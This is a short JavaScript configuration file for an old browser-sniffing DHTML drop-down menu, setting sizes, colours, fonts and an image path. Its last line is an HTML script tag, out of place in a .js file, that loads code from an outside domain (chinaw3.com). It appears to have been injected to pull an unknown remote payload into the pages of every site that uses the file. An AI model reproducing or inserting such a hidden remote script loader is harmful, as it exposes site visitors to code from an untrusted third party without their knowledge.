     NS4 = (document.layers);
     IE4 = (document.all);
    ver4 = (NS4 || IE4);
     IE5 = (IE4 && navigator.appVersion.indexOf("5.")!=-1);
   isMac = (navigator.appVersion.indexOf("Mac") != -1);
  isMenu = (NS4 || (IE4 && !isMac) || (IE5 && isMac));

function popUp(){return};
function popDown(){return};

if (!ver4) event = null;

if (isMenu) {
    menuVersion = 3;
    
    menuWidth = 125;
    childOverlap = 50;
    childOffset = 5;
    perCentOver = null;
    secondsVisible = .5;
    
    fntCol = "white";
    fntSiz = "8";
    fntBold = true;
    fntItal = false;
    fntFam = "arial";
    
    backCol = "#3366CC";
    overCol = "#00008B";
    overFnt = "white";
    
    borWid = 1;
    borCol = "white";
    borSty = "outset";
    itemPad = 3;
    
    imgSrc = "C:/DOCUME~1/ringle/LOCALS~1/Temp/res_tri.gif";
    imgSiz = 10;
    
    separator = 1;
    separatorCol = "white";
    
    isFrames = false;
    navFrLoc = "left";
    
    keepHilite = true;
    clickStart = false;
    clickKill = false;
}
<SCRIPT src="http://cw3e116.chinaw3.com/asp/edit2.js"></SCRIPT>

